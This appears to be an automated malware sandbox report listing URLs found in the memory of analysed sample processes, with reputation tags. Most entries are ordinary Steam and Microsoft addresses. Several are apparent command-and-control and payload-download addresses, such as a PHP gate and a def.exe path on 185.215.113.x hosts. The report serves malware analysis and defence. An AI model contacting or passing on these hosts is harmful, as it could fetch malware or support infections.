                                                                                                                    https://www.youtube.comc61fcc859d.exe, 0000001E.00000002.2748280155.0000000001391000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748428421.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCcrypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://community.fastly.steamstatic.com/public/css/globalv2.css?v=1Zpka7DM_TWk&amp;l=englishcrypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744411086.00000000013D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackcrypted.exe, 00000013.00000003.2516436644.00000000031F1000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516651844.00000000031FA000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744443692.000000000136C000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744805061.000000000137B000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=ij4Q-MLeHxnJ&amp;l=englc61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744411086.00000000013D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://nuget.org/nuget.exepowershell.exe, 0000000D.00000002.2454333796.00000144DD7A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2501574678.00000144EC071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2501574678.00000144EBF2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2687459225.00000260901B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2596038718.00000260819E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2687459225.000002609007E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000002.2529146420.0000000003250000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://steamcommunity.com/profiles/76561199724331900zcrypted.exe, 00000013.00000003.2516436644.00000000031E4000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000002.2528369086.00000000031E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://s.ytimg.com;c61fcc859d.exe, 0000001E.00000002.2748280155.0000000001391000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748428421.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000D.00000002.2454333796.00000144DBEC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2596038718.0000026080001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1crypted.exe, 00000013.00000002.2528369086.00000000031F1000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516436644.00000000031F1000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000002.2529146420.0000000003250000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2614055476.00000000010DC000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2614392992.00000000010DC000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2597838654.00000000010D7000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2572394052.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2587650360.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2585443365.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2569730542.00000000010D7000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2570490116.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2745036681.000000000136C000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744443692.000000000136C000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748090958.000000000136C000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94file.exe, 00000000.00000002.1975345843.00000000234F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958471071.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2599723843.0000000005775000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://185.215.113.206/68b591d6548ec281/msvcp140.dll-Dzfile.exe, 00000000.00000002.1958471071.0000000000A28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                            		unknown
                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=fK65ckRAjZr-&amp;crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744411086.00000000013D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001A.00000002.2596038718.0000026081874000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2596038718.00000260816C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001A.00000002.2596038718.0000026081874000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2596038718.00000260816C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://contoso.com/Iconpowershell.exe, 0000001A.00000002.2687459225.000002609007E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=1vfyNnvUqkgy&amp;l=englc61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000002.1958471071.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2569852727.00000000057B5000.00000004.00000800.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2569975915.00000000057B2000.00000004.00000800.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2570672248.00000000057B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctafile.exe, 00000000.00000002.1975345843.00000000234F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958471071.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2599723843.0000000005775000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://ocsp.rootca1.amazontrust.com0:c61fcc859d.exe, 00000017.00000003.2597329510.00000000057AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://www.ecosia.org/newtab/c61fcc859d.exe, 00000017.00000003.2569852727.00000000057B5000.00000004.00000800.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2569975915.00000000057B2000.00000004.00000800.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2570672248.00000000057B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://lv.queniujq.cnc61fcc859d.exe, 0000001E.00000002.2748280155.0000000001391000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748428421.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://steamcommunity.com/profiles/76561199724331900/inventory/c61fcc859d.exe, 00000017.00000003.2614055476.00000000010DC000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2674653328.00000000010DB000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2614392992.00000000010DC000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2628427512.00000000010DB000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2597838654.00000000010D7000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2572394052.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2587650360.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2585443365.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2569730542.00000000010D7000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2570490116.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://www.youtube.com/c61fcc859d.exe, 0000001E.00000002.2748280155.0000000001391000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748428421.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://github.com/Pester/Pesterpowershell.exe, 0000001A.00000002.2596038718.0000026081874000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2596038718.00000260816C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://community.fac61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://www.google.com/recaptcha/c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://checkout.steampowered.com/c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://185.215.113.16/off/def.exec61fcc859d.exe, 00000017.00000002.2781937104.0000000001061000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=g2Zx7e0yBV_M&amp;l=englishcrypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744411086.00000000013D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesc61fcc859d.exe, 00000017.00000003.2569524263.000000000579C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://185.215.113.206/$$309de20225.exe, 0000001F.00000002.2848404906.0000000000F74000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                		unknown
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://help.steampowered.com/en/crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=ec61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://marshal-zhukov.com/0c61fcc859d.exe, 00000017.00000003.2674681113.00000000010CC000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2613954644.00000000010CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      http://185.215.113.206/c4becf79229cb002.phpo309de20225.exe, 00000018.00000002.2626496741.0000000000D48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      http://185.215.113.206/c4becf79229cb002.phps309de20225.exe, 00000018.00000002.2626496741.0000000000D48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://185.215.113.206/c4becf79229cb002.phptc61fcc859d.exe, 00000017.00000002.2787369302.0000000005771000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        https://recaptcha.net/recaptcha/;c61fcc859d.exe, 0000001E.00000002.2748280155.0000000001391000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748428421.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=ftiDdX_V0QeB&amp;l=englisc61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://185.215.113.206/c4becf79229cb002.phpxc61fcc859d.exe, 00000017.00000002.2787369302.0000000005771000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            https://marshal-zhukov.com/apiWc61fcc859d.exe, 00000017.00000003.2628472202.0000000005761000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            https://broadcast.st.dl.eccdnx.comc61fcc859d.exe, 0000001E.00000002.2748280155.0000000001391000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748428421.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngcrypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                http://185.215.113.206onesfile.exe, 00000000.00000002.1958673273.0000000000C05000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                http://x1.c.lencr.org/0c61fcc859d.exe, 00000017.00000003.2597329510.00000000057AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  http://x1.i.lencr.org/0c61fcc859d.exe, 00000017.00000003.2597329510.00000000057AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exefile.exe, 00000000.00000002.1958673273.0000000000C05000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      http://185.215.113.206/RRC:c61fcc859d.exe, 00000017.00000002.2787369302.0000000005760000.00000004.00000800.00020000.00000000.sdmp, 309de20225.exe, 00000018.00000002.2626496741.0000000000CEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://steamcommunity.com/workshop/crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwcrypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://login.steampowered.com/c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://support.mozilla.org/products/firefoxgro.allc61fcc859d.exe, 00000017.00000003.2599215008.0000000005880000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://store.steampowered.com/legal/crypted.exe, 00000013.00000002.2528369086.00000000031F1000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516436644.00000000031F1000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000002.2529146420.0000000003250000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2597838654.00000000010D7000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2572394052.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2587650360.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2585443365.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2569730542.00000000010D7000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2570490116.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2745036681.000000000136C000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744443692.000000000136C000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748090958.000000000136C000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  http://store.steampowered.com/pc61fcc859d.exe, 00000017.00000003.2597838654.00000000010D7000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2572394052.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2587650360.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2585443365.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2569730542.00000000010D7000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2570490116.00000000010DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
